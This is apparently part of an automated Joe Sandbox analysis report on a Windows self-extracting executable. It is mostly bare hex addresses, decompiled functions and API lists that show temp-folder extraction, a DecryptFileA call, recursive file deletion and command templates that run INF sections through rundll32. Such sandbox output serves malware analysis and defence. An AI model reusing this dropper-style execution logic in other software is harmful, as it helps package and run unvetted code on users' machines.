                                                                                                                                                                                                                                                0x00021cc2
                                                                                                                                                                                                                                                0x00021ccc
                                                                                                                                                                                                                                                0x00021cce
                                                                                                                                                                                                                                                0x00021cce
                                                                                                                                                                                                                                                0x00021cdb
                                                                                                                                                                                                                                                0x00021ce6
                                                                                                                                                                                                                                                0x00021cee
                                                                                                                                                                                                                                                0x00021cee
                                                                                                                                                                                                                                                0x00021e89
                                                                                                                                                                                                                                                0x00021e91
                                                                                                                                                                                                                                                0x00021e92
                                                                                                                                                                                                                                                0x00021e94
                                                                                                                                                                                                                                                0x00021e97
                                                                                                                                                                                                                                                0x00021ea4
                                                                                                                                                                                                                                                0x00021ea4
                                                                                                                                                                                                                                                0x00021c61
                                                                                                                                                                                                                                                0x00021c07
                                                                                                                                                                                                                                                0x00021bd3
                                                                                                                                                                                                                                                0x00021b7b

APIs
• CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00021BE7
• GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00021BFE
• LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00021C57
• GetPrivateProfileIntA.KERNEL32 ref: 00021C88
• GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00021140,00000000,00000008,?), ref: 00021CB8
• GetShortPathNameA.KERNEL32 ref: 00021D1B
                                                                                                                                                                                                                                                  • Part of subcall function 000244B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00024518
                                                                                                                                                                                                                                                  • Part of subcall function 000244B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00024554
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                                                                • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                                                                • API String ID: 383838535-2145762761
                                                                                                                                                                                                                                                • Opcode ID: cfc259eac6d7ee3083220e355b50835203fec8f64eb2c181b341bc6892cd552e
                                                                                                                                                                                                                                                • Instruction ID: 140f24f5848d846a813fb6daf4d4313087b6456f7322ec60d95674c6d55aa7b2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cfc259eac6d7ee3083220e355b50835203fec8f64eb2c181b341bc6892cd552e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 33A16B70A002386BEF709B24FC45FEA77B9DB71310F2442A5E555A72C1DBB49E86CB50
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                control_flow_graph 450 22f1d-22f3d 451 22f3f-22f46 450->451 452 22f6c-22f73 call 25164 450->452 454 22f48 call 251e5 451->454 455 22f5f-22f66 call 23a3f 451->455 459 23041 452->459 460 22f79-22f80 call 255a0 452->460 461 22f4d-22f4f 454->461 455->452 455->459 464 23043-23053 call 26ce0 459->464 460->459 468 22f86-22fbe GetSystemDirectoryA call 2658a LoadLibraryA 460->468 461->459 465 22f55-22f5d 461->465 465->452 465->455 472 22fc0-22fd4 GetProcAddress 468->472 473 22ff7-23004 FreeLibrary 468->473 472->473 474 22fd6-22fee DecryptFileA 472->474 475 23006-2300c 473->475 476 23017-23024 SetCurrentDirectoryA 473->476 474->473 489 22ff0-22ff5 474->489 475->476 479 2300e call 2621e 475->479 477 23026-2303c call 244b9 call 26285 476->477 478 23054-2305a 476->478 477->459 483 23065-2306c 478->483 484 2305c call 23b26 478->484 485 23013-23015 479->485 486 2306e-23075 call 2256d 483->486 487 2307c-23089 483->487 495 23061-23063 484->495 485->459 485->476 496 2307a 486->496 492 230a1-230a9 487->492 493 2308b-23091 487->493 489->473 499 230b4-230b7 492->499 500 230ab-230ad 492->500 493->492 497 23093 call 23ba2 493->497 495->459 495->483 496->487 503 23098-2309a 497->503 499->464 500->499 502 230af call 24169 500->502 502->499 503->459 505 2309c 503->505 505->492
                                                                                                                                                                                                                                                C-Code - Quality: 82%
                                                                                                                                                                                                                                                			E00022F1D(void* __ecx, int __edx) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v272;
                                                                                                                                                                                                                                                				_Unknown_base(*)()* _v276;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t9;
                                                                                                                                                                                                                                                				void* _t11;
                                                                                                                                                                                                                                                				struct HWND__* _t12;
                                                                                                                                                                                                                                                				void* _t14;
                                                                                                                                                                                                                                                				int _t21;
                                                                                                                                                                                                                                                				signed int _t22;
                                                                                                                                                                                                                                                				signed int _t25;
                                                                                                                                                                                                                                                				intOrPtr* _t26;
                                                                                                                                                                                                                                                				signed int _t27;
                                                                                                                                                                                                                                                				void* _t30;
                                                                                                                                                                                                                                                				_Unknown_base(*)()* _t31;
                                                                                                                                                                                                                                                				void* _t34;
                                                                                                                                                                                                                                                				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                                				intOrPtr _t41;
                                                                                                                                                                                                                                                				intOrPtr* _t44;
                                                                                                                                                                                                                                                				signed int _t46;
                                                                                                                                                                                                                                                				int _t47;
                                                                                                                                                                                                                                                				void* _t58;
                                                                                                                                                                                                                                                				void* _t59;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t43 = __edx;
                                                                                                                                                                                                                                                				_t9 =  *0x28004; // 0xf4950d3e
                                                                                                                                                                                                                                                				_v8 = _t9 ^ _t46;
                                                                                                                                                                                                                                                				if( *0x28a38 != 0) {
                                                                                                                                                                                                                                                					L5:
                                                                                                                                                                                                                                                					_t11 = E00025164(_t52);
                                                                                                                                                                                                                                                					_t53 = _t11;
                                                                                                                                                                                                                                                					if(_t11 == 0) {
                                                                                                                                                                                                                                                						L16:
                                                                                                                                                                                                                                                						_t12 = 0;
                                                                                                                                                                                                                                                						L17:
                                                                                                                                                                                                                                                						return E00026CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_t14 = E000255A0(_t53); // executed
                                                                                                                                                                                                                                                					if(_t14 == 0) {
                                                                                                                                                                                                                                                						goto L16;
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						_t45 = 0x105;
                                                                                                                                                                                                                                                						GetSystemDirectoryA( &_v272, 0x105);
                                                                                                                                                                                                                                                						_t43 = 0x105;
                                                                                                                                                                                                                                                						_t40 =  &_v272;
                                                                                                                                                                                                                                                						E0002658A( &_v272, 0x105, "advapi32.dll");
                                                                                                                                                                                                                                                						_t36 = LoadLibraryA( &_v272);
                                                                                                                                                                                                                                                						_t44 = 0;
                                                                                                                                                                                                                                                						if(_t36 != 0) {
                                                                                                                                                                                                                                                							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                                                                                                                                                                                                							_v276 = _t31;
                                                                                                                                                                                                                                                							if(_t31 != 0) {
                                                                                                                                                                                                                                                								_t45 = _t47;
                                                                                                                                                                                                                                                								_t40 = _t31;
                                                                                                                                                                                                                                                								 *0x2a288("C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\", 0); // executed
                                                                                                                                                                                                                                                								_v276();
                                                                                                                                                                                                                                                								if(_t47 != _t47) {
                                                                                                                                                                                                                                                									_t40 = 4;
                                                                                                                                                                                                                                                									asm("int 0x29");
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						FreeLibrary(_t36);
                                                                                                                                                                                                                                                						_t58 =  *0x28a24 - _t44; // 0x0
                                                                                                                                                                                                                                                						if(_t58 != 0) {
                                                                                                                                                                                                                                                							L14:
                                                                                                                                                                                                                                                							_t21 = SetCurrentDirectoryA("C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\"); // executed
                                                                                                                                                                                                                                                							if(_t21 != 0) {
                                                                                                                                                                                                                                                								__eflags =  *0x28a2c - _t44; // 0x0
                                                                                                                                                                                                                                                								if(__eflags != 0) {
                                                                                                                                                                                                                                                									L20:
                                                                                                                                                                                                                                                									__eflags =  *0x28d48 & 0x000000c0;
                                                                                                                                                                                                                                                									if(( *0x28d48 & 0x000000c0) == 0) {
                                                                                                                                                                                                                                                										_t41 =  *0x29a40; // 0x3, executed
                                                                                                                                                                                                                                                										_t26 = E0002256D(_t41); // executed
                                                                                                                                                                                                                                                										_t44 = _t26;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									_t22 =  *0x28a24; // 0x0
                                                                                                                                                                                                                                                									 *0x29a44 = _t44;
                                                                                                                                                                                                                                                									__eflags = _t22;
                                                                                                                                                                                                                                                									if(_t22 != 0) {
                                                                                                                                                                                                                                                										L26:
                                                                                                                                                                                                                                                										__eflags =  *0x28a38;
                                                                                                                                                                                                                                                										if( *0x28a38 == 0) {
                                                                                                                                                                                                                                                											__eflags = _t22;
                                                                                                                                                                                                                                                											if(__eflags == 0) {
                                                                                                                                                                                                                                                												E00024169(__eflags);
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                										_t12 = 1;
                                                                                                                                                                                                                                                										goto L17;
                                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                                										__eflags =  *0x29a30 - _t22; // 0x0
                                                                                                                                                                                                                                                										if(__eflags != 0) {
                                                                                                                                                                                                                                                											goto L26;
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                										_t25 = E00023BA2(); // executed
                                                                                                                                                                                                                                                										__eflags = _t25;
                                                                                                                                                                                                                                                										if(_t25 == 0) {
                                                                                                                                                                                                                                                											goto L16;
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                										_t22 =  *0x28a24; // 0x0
                                                                                                                                                                                                                                                										goto L26;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								_t27 = E00023B26(_t40, _t44);
                                                                                                                                                                                                                                                								__eflags = _t27;
                                                                                                                                                                                                                                                								if(_t27 == 0) {
                                                                                                                                                                                                                                                									goto L16;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								goto L20;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							_t43 = 0x4bc;
                                                                                                                                                                                                                                                							E000244B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                                                                                                                                                                                                							 *0x29124 = E00026285();
                                                                                                                                                                                                                                                							goto L16;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t59 =  *0x29a30 - _t44; // 0x0
                                                                                                                                                                                                                                                						if(_t59 != 0) {
                                                                                                                                                                                                                                                							goto L14;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t30 = E0002621E(); // executed
                                                                                                                                                                                                                                                						if(_t30 == 0) {
                                                                                                                                                                                                                                                							goto L16;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						goto L14;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t49 =  *0x28a24;
                                                                                                                                                                                                                                                				if( *0x28a24 != 0) {
                                                                                                                                                                                                                                                					L4:
                                                                                                                                                                                                                                                					_t34 = E00023A3F(_t51);
                                                                                                                                                                                                                                                					_t52 = _t34;
                                                                                                                                                                                                                                                					if(_t34 == 0) {
                                                                                                                                                                                                                                                						goto L16;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					goto L5;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				if(E000251E5(_t49) == 0) {
                                                                                                                                                                                                                                                					goto L16;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t51 =  *0x28a38;
                                                                                                                                                                                                                                                				if( *0x28a38 != 0) {
                                                                                                                                                                                                                                                					goto L5;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				goto L4;
                                                                                                                                                                                                                                                			}




























                                                                                                                                                                                                                                                0x000230af
                                                                                                                                                                                                                                                0x000230af
                                                                                                                                                                                                                                                0x000230ad
                                                                                                                                                                                                                                                0x000230b6
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002308b
                                                                                                                                                                                                                                                0x0002308b
                                                                                                                                                                                                                                                0x00023091
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023093
                                                                                                                                                                                                                                                0x00023098
                                                                                                                                                                                                                                                0x0002309a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002309c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002309c
                                                                                                                                                                                                                                                0x00023089
                                                                                                                                                                                                                                                0x0002305c
                                                                                                                                                                                                                                                0x00023061
                                                                                                                                                                                                                                                0x00023063
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023063
                                                                                                                                                                                                                                                0x0002302b
                                                                                                                                                                                                                                                0x00023032
                                                                                                                                                                                                                                                0x0002303c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002303c
                                                                                                                                                                                                                                                0x00023006
                                                                                                                                                                                                                                                0x0002300c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002300e
                                                                                                                                                                                                                                                0x00023015
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023015
                                                                                                                                                                                                                                                0x00022f80
                                                                                                                                                                                                                                                0x00022f3f
                                                                                                                                                                                                                                                0x00022f46
                                                                                                                                                                                                                                                0x00022f5f
                                                                                                                                                                                                                                                0x00022f5f
                                                                                                                                                                                                                                                0x00022f64
                                                                                                                                                                                                                                                0x00022f66
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00022f66
                                                                                                                                                                                                                                                0x00022f4f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00022f55
                                                                                                                                                                                                                                                0x00022f5d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetSystemDirectoryA.KERNEL32 ref: 00022F93
                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00022FB2
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00022FC6
                                                                                                                                                                                                                                                • DecryptFileA.ADVAPI32 ref: 00022FE6
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00022FF8
                                                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0002301C
                                                                                                                                                                                                                                                  • Part of subcall function 000251E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00022F4D,?,00000002,00000000), ref: 00025201
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                                                                • API String ID: 2126469477-4070797333
                                                                                                                                                                                                                                                • Opcode ID: bfa0d180740c4882d01b8b7f2a0bd1fd18646fe0d8b238dbb395a0fcf58ac091
                                                                                                                                                                                                                                                • Instruction ID: 4f9f8d62a29df92fd0fbe4f38dfb9a35c0611ecef57198854c67d9366021d47c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bfa0d180740c4882d01b8b7f2a0bd1fd18646fe0d8b238dbb395a0fcf58ac091
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A341CB30A013359BFB70AB71BD966A673E89B54750F204075AE45D2192EF7CCE82CB71
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 648 22390-223b3 649 224cb-224df call 26ce0 648->649 650 223b9-223bc 648->650 650->649 652 223c2-22401 call 21680 call 216b3 FindFirstFileA 650->652 652->649 658 22407-2241f call 21680 652->658 661 22421-2242f lstrcmpA 658->661 662 22479-224a3 call 216b3 SetFileAttributesA DeleteFileA 658->662 664 22431-22443 lstrcmpA 661->664 665 224a9-224b7 FindNextFileA 661->665 662->665 664->665 668 22445-22477 call 216b3 call 2658a call 22390 664->668 665->658 667 224bd-224c5 FindClose RemoveDirectoryA 665->667 667->649 668->665
                                                                                                                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                                                                                                                			E00022390(CHAR* __ecx) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v276;
                                                                                                                                                                                                                                                				char _v280;
                                                                                                                                                                                                                                                				char _v284;
                                                                                                                                                                                                                                                				struct _WIN32_FIND_DATAA _v596;
                                                                                                                                                                                                                                                				struct _WIN32_FIND_DATAA _v604;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t21;
                                                                                                                                                                                                                                                				int _t36;
                                                                                                                                                                                                                                                				void* _t46;
                                                                                                                                                                                                                                                				void* _t62;
                                                                                                                                                                                                                                                				void* _t63;
                                                                                                                                                                                                                                                				CHAR* _t65;
                                                                                                                                                                                                                                                				void* _t66;
                                                                                                                                                                                                                                                				signed int _t67;
                                                                                                                                                                                                                                                				signed int _t69;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                                                                                                                                                                                                				_t21 =  *0x28004; // 0xf4950d3e
                                                                                                                                                                                                                                                				_t22 = _t21 ^ _t69;
                                                                                                                                                                                                                                                				_v8 = _t21 ^ _t69;
                                                                                                                                                                                                                                                				_t65 = __ecx;
                                                                                                                                                                                                                                                				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                                                                                                                                                                                                					L10:
                                                                                                                                                                                                                                                					_pop(_t62);
                                                                                                                                                                                                                                                					_pop(_t66);
                                                                                                                                                                                                                                                					_pop(_t46);
                                                                                                                                                                                                                                                					return E00026CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					E00021680( &_v276, 0x104, __ecx);
                                                                                                                                                                                                                                                					_t58 = 0x104;
                                                                                                                                                                                                                                                					E000216B3( &_v280, 0x104, "*");
                                                                                                                                                                                                                                                					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                                                                                                                                                                                                					_t63 = _t22;
                                                                                                                                                                                                                                                					if(_t63 == 0xffffffff) {
                                                                                                                                                                                                                                                						goto L10;
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						goto L3;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                                						L3:
                                                                                                                                                                                                                                                						_t58 = 0x104;
                                                                                                                                                                                                                                                						E00021680( &_v276, 0x104, _t65);
                                                                                                                                                                                                                                                						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                                                                                                                                                                                                							_t58 = 0x104;
                                                                                                                                                                                                                                                							E000216B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                                                                                                                                                                                                							SetFileAttributesA( &_v280, 0x80);
                                                                                                                                                                                                                                                							DeleteFileA( &_v280);
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                                                                                                                                                                                                								E000216B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                                                                                                                                                                                                								_t58 = 0x104;
                                                                                                                                                                                                                                                								E0002658A( &_v280, 0x104, 0x21140);
                                                                                                                                                                                                                                                								E00022390( &_v284);
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                                                                                                                                                                                                					} while (_t36 != 0);
                                                                                                                                                                                                                                                					FindClose(_t63); // executed
                                                                                                                                                                                                                                                					_t22 = RemoveDirectoryA(_t65); // executed
                                                                                                                                                                                                                                                					goto L10;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                			}






















                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FindFirstFileA.KERNELBASE(?,00028A3A,000211F4,00028A3A,00000000,?,?), ref: 000223F6
                                                                                                                                                                                                                                                • lstrcmpA.KERNEL32(?,000211F8), ref: 00022427
                                                                                                                                                                                                                                                • lstrcmpA.KERNEL32(?,000211FC), ref: 0002243B
                                                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00022495
                                                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?), ref: 000224A3
                                                                                                                                                                                                                                                • FindNextFileA.KERNELBASE(00000000,00000010), ref: 000224AF
                                                                                                                                                                                                                                                • FindClose.KERNELBASE(00000000), ref: 000224BE
                                                                                                                                                                                                                                                • RemoveDirectoryA.KERNELBASE(00028A3A), ref: 000224C5
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 836429354-0
                                                                                                                                                                                                                                                • Opcode ID: c1b3ac11058ca83863f5a242395ac866d6450c92bb4f19343cee6c2c58974109
                                                                                                                                                                                                                                                • Instruction ID: 7fa2cbe0b13c78a1f449b1b397756f87c786a0b6aef30487b2b8904493e9ab9c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c1b3ac11058ca83863f5a242395ac866d6450c92bb4f19343cee6c2c58974109
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B531A131204750ABD330EFA4EC89AEF73ECABC5315F14492EB55586291EF38990EC752
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 70%
                                                                                                                                                                                                                                                			E00022BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				void* __ebp;
                                                                                                                                                                                                                                                				long _t4;
                                                                                                                                                                                                                                                				void* _t6;
                                                                                                                                                                                                                                                				intOrPtr _t7;
                                                                                                                                                                                                                                                				void* _t9;
                                                                                                                                                                                                                                                				struct HINSTANCE__* _t12;
                                                                                                                                                                                                                                                				intOrPtr* _t17;
                                                                                                                                                                                                                                                				signed char _t19;
                                                                                                                                                                                                                                                				intOrPtr* _t21;
                                                                                                                                                                                                                                                				void* _t22;
                                                                                                                                                                                                                                                				void* _t24;
                                                                                                                                                                                                                                                				intOrPtr _t32;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t4 = GetVersion();
                                                                                                                                                                                                                                                				if(_t4 >= 0 && _t4 >= 6) {
                                                                                                                                                                                                                                                					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                                                                                                                                                                                                					if(_t12 != 0) {
                                                                                                                                                                                                                                                						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                                                                                                                                                                                                						if(_t21 != 0) {
                                                                                                                                                                                                                                                							_t17 = _t21;
                                                                                                                                                                                                                                                							 *0x2a288(0, 1, 0, 0);
                                                                                                                                                                                                                                                							 *_t21();
                                                                                                                                                                                                                                                							_t29 = _t24 - _t24;
                                                                                                                                                                                                                                                							if(_t24 != _t24) {
                                                                                                                                                                                                                                                								_t17 = 4;
                                                                                                                                                                                                                                                								asm("int 0x29");
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t20 = _a12;
                                                                                                                                                                                                                                                				_t18 = _a4;
                                                                                                                                                                                                                                                				 *0x29124 = 0;
                                                                                                                                                                                                                                                				if(E00022CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                                                                                                                                                                                                					_t9 = E00022F1D(_t18, _t20); // executed
                                                                                                                                                                                                                                                					_t22 = _t9; // executed
                                                                                                                                                                                                                                                					E000252B6(0, _t18, _t21, _t22); // executed
                                                                                                                                                                                                                                                					if(_t22 != 0) {
                                                                                                                                                                                                                                                						_t32 =  *0x28a3a; // 0x0
                                                                                                                                                                                                                                                						if(_t32 == 0) {
                                                                                                                                                                                                                                                							_t19 =  *0x29a2c; // 0x0
                                                                                                                                                                                                                                                							if((_t19 & 0x00000001) != 0) {
                                                                                                                                                                                                                                                								E00021F90(_t19, _t21, _t22);
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t6 =  *0x28588; // 0x0
                                                                                                                                                                                                                                                				if(_t6 != 0) {
                                                                                                                                                                                                                                                					CloseHandle(_t6);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t7 =  *0x29124; // 0x80070002
                                                                                                                                                                                                                                                				return _t7;
                                                                                                                                                                                                                                                			}



















                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetVersion.KERNEL32(?,00000002,00000000,?,00026BB0,00020000,00000000,00000002,0000000A), ref: 00022C03
                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00026BB0,00020000,00000000,00000002,0000000A), ref: 00022C18
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00022C28
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00026BB0,00020000,00000000,00000002,0000000A), ref: 00022C98
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
